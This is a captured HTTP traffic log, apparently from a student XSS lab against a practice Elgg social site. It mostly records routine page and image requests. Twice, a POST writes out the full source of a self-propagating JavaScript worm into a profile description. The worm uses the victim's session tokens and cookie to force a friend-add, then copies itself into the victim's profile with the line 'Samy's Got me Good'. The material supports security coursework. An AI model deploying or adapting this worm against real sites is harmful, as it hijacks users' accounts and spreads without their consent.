http://www.xsslabelgg.com/profile/admin

GET /profile/admin HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3149
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css

GET /cache/css/default/elgg.1410864370.css HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-None-Match: "1410864370"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=87
Vary: Accept-Encoding
----------------------------------------------------------
http://www.xsslabelgg.com/vendors/jquery/jquery-1.6.4.min.js

GET /vendors/jquery/jquery-1.6.4.min.js HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "16614-5032c6003332d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=86
Etag: "16614-5032c6003332d"
Vary: Accept-Encoding
----------------------------------------------------------
http://www.xsslabelgg.com/vendors/jquery/jquery-ui-1.8.16.min.js

GET /vendors/jquery/jquery-ui-1.8.16.min.js HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "31493-5032c600371b5"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=85
Etag: "31493-5032c600371b5"
Vary: Accept-Encoding
----------------------------------------------------------
http://www.xsslabelgg.com/cache/js/default/elgg.1410864370.js

GET /cache/js/default/elgg.1410864370.js HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-None-Match: "1410864370"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=84
Vary: Accept-Encoding
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/elgg_toolbar_logo.gif

GET /_graphics/elgg_toolbar_logo.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "5f5-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "5f5-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/icons/user/defaulttopbar.gif

GET /_graphics/icons/user/defaulttopbar.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "257-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "257-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/spacer.gif

GET /_graphics/spacer.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "2b-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "2b-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/action/profile/edit

POST /action/profile/edit HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.xsslabelgg.com/profile/admin
Content-Length: 3085
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
__elgg_token=46ea19ddd6fdfd6c804a9caf2a19814e&__elgg_ts=1510774375&description=<script id = 'worm' type= 'text/javascript'>// <![CDATA[
var ts = "&__elgg_ts=".concat(elgg.security.token.__elgg_ts);
	var token = "__elgg_token=".concat(elgg.security.token.__elgg_token);
	var sendurl = "/action/friends/add?friend=33".concat(ts).concat("&").concat(token);

	var guid = elgg.get_logged_in_user_guid();
	var cookie = document.cookie;

	var user =null;
	user = elgg.get_logged_in_user_entity() ;
	var username = user.name;
	var Ajax=null;
	Ajax=new XMLHttpRequest();

	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("User-agent", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0");
	Ajax.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
	Ajax.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	Ajax.setRequestHeader("Accept-Encoding", "gzip, deflate");
	Ajax.setRequestHeader("Referer", "http://www.xsslabelgg.com/profile/admin");
	Ajax.setRequestHeader("Cookie",cookie);
	Ajax.setRequestHeader("Connection","keep-alive");
	Ajax.send();
	Ajax.abort();

	Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("User-agent", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0");
	Ajax.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
	Ajax.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	Ajax.setRequestHeader("Accept-Encoding", "gzip, deflate");
	Ajax.setRequestHeader("Referer", "http://www.xsslabelgg.com/profile/admin");
	Ajax.setRequestHeader("Cookie",cookie);
	Ajax.setRequestHeader("Connection","keep-alive");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.setRequestHeader("Content-Length","keep-alive");

	var content=token.concat(ts).concat(name).concat("&description=");
	content = content .concat("<script id = 'worm' type= 'text/javascript'>").concat(document.getElementById("worm").innerHTML).concat("</").concat("script>");
	var content2 = content .concat("&accesslevel%5Bdescription%5D=2&briefdescription=Samy's Got me Good [] &accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2&guid=").concat(guid);

	Ajax.send(content2);
// ]]></script>&accesslevel%5Bdescription%5D=2&briefdescription=Samy's Got me Good [] &accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2&guid=39
HTTP/1.1 302 Found
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.xsslabelgg.com/profile/admin
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/powered_by_elgg_badge_drk_bckgnd.gif

GET /_graphics/powered_by_elgg_badge_drk_bckgnd.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "3b3-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=99
Etag: "3b3-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/elgg_sprites.png

GET /_graphics/elgg_sprites.png HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "4b66-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=99
Etag: "4b66-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/header_shadow.png

GET /_graphics/header_shadow.png HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "9a-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=99
Etag: "9a-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/icons/user/defaultlarge.gif

GET /_graphics/icons/user/defaultlarge.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "b6c-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=98
Etag: "b6c-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/mod/reportedcontent/graphics/icon_reportthis.gif

GET /mod/reportedcontent/graphics/icon_reportthis.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "23a-5032c6002296b"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "23a-5032c6002296b"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/toptoolbar_background.gif

GET /_graphics/toptoolbar_background.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "7ec-5032c60042d4d"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=82
Etag: "7ec-5032c60042d4d"
----------------------------------------------------------
http://www.xsslabelgg.com/_graphics/button_background.gif

GET /_graphics/button_background.gif HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/cache/css/default/elgg.1410864370.css
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-Modified-Since: Tue, 16 Sep 2014 10:40:07 GMT
If-None-Match: "312-5032c60043cef"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=98
Etag: "312-5032c60043cef"
----------------------------------------------------------
http://www.xsslabelgg.com/ajax/view/js/languages?language=en&lc=1410864370

GET /ajax/view/js/languages?language=en&lc=1410864370 HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
If-None-Match: "408f90690a42cb4cbdc33cb5a2ec0651"
Cache-Control: max-age=0

HTTP/1.1 304 Not Modified
Date: Wed, 15 Nov 2017 19:32:55 GMT
Server: Apache/2.2.22 (Ubuntu)
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: "408f90690a42cb4cbdc33cb5a2ec0651"
Expires: Tue, 15 May 2018 18:32:55 GMT
Cache-Control: public
Vary: Accept-Encoding
----------------------------------------------------------
http://www.xsslabelgg.com/profile/admin

GET /profile/admin HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 19:32:56 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3215
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
http://www.xsslabelgg.com/action/friends/add?friend=33&__elgg_ts=1510774375&__elgg_token=46ea19ddd6fdfd6c804a9caf2a19814e

GET /action/friends/add?friend=33&__elgg_ts=1510774375&__elgg_token=46ea19ddd6fdfd6c804a9caf2a19814e HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive

HTTP/1.1 302 Found
Date: Wed, 15 Nov 2017 19:32:56 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.xsslabelgg.com/profile/admin
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
http://www.xsslabelgg.com/profile/admin

GET /profile/admin HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 19:32:57 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3208
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
http://www.xsslabelgg.com/action/profile/edit

POST /action/profile/edit HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.xsslabelgg.com/profile/admin
Content-Length: 3085
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
__elgg_token=eebae97dc5cae87ac5721a40dfc0d4db&__elgg_ts=1510774377&description=<script id = 'worm' type= 'text/javascript'>// <![CDATA[
var ts = "&__elgg_ts=".concat(elgg.security.token.__elgg_ts);
	var token = "__elgg_token=".concat(elgg.security.token.__elgg_token);
	var sendurl = "/action/friends/add?friend=33".concat(ts).concat("&").concat(token);

	var guid = elgg.get_logged_in_user_guid();
	var cookie = document.cookie;

	var user =null;
	user = elgg.get_logged_in_user_entity() ;
	var username = user.name;
	var Ajax=null;
	Ajax=new XMLHttpRequest();

	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("User-agent", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0");
	Ajax.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
	Ajax.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	Ajax.setRequestHeader("Accept-Encoding", "gzip, deflate");
	Ajax.setRequestHeader("Referer", "http://www.xsslabelgg.com/profile/admin");
	Ajax.setRequestHeader("Cookie",cookie);
	Ajax.setRequestHeader("Connection","keep-alive");
	Ajax.send();
	Ajax.abort();

	Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("User-agent", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0");
	Ajax.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
	Ajax.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
	Ajax.setRequestHeader("Accept-Encoding", "gzip, deflate");
	Ajax.setRequestHeader("Referer", "http://www.xsslabelgg.com/profile/admin");
	Ajax.setRequestHeader("Cookie",cookie);
	Ajax.setRequestHeader("Connection","keep-alive");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.setRequestHeader("Content-Length","keep-alive");

	var content=token.concat(ts).concat(name).concat("&description=");
	content = content .concat("<script id = 'worm' type= 'text/javascript'>").concat(document.getElementById("worm").innerHTML).concat("</").concat("script>");
	var content2 = content .concat("&accesslevel%5Bdescription%5D=2&briefdescription=Samy's Got me Good [] &accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2&guid=").concat(guid);

	Ajax.send(content2);
// ]]></script>&accesslevel%5Bdescription%5D=2&briefdescription=Samy's Got me Good [] &accesslevel%5Bbriefdescription%5D=2&location=&accesslevel%5Blocation%5D=2&interests=&accesslevel%5Binterests%5D=2&skills=&accesslevel%5Bskills%5D=2&contactemail=&accesslevel%5Bcontactemail%5D=2&phone=&accesslevel%5Bphone%5D=2&mobile=&accesslevel%5Bmobile%5D=2&website=&accesslevel%5Bwebsite%5D=2&twitter=&accesslevel%5Btwitter%5D=2&guid=39
HTTP/1.1 302 Found
Date: Wed, 15 Nov 2017 19:32:57 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.xsslabelgg.com/profile/admin
Content-Length: 0
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
http://www.xsslabelgg.com/profile/admin

GET /profile/admin HTTP/1.1
Host: www.xsslabelgg.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.xsslabelgg.com/profile/admin
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.2.903899544.1510450992; Elgg=hde0hgcmk28328ho59t0t4vrb4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 19:32:58 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3224
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
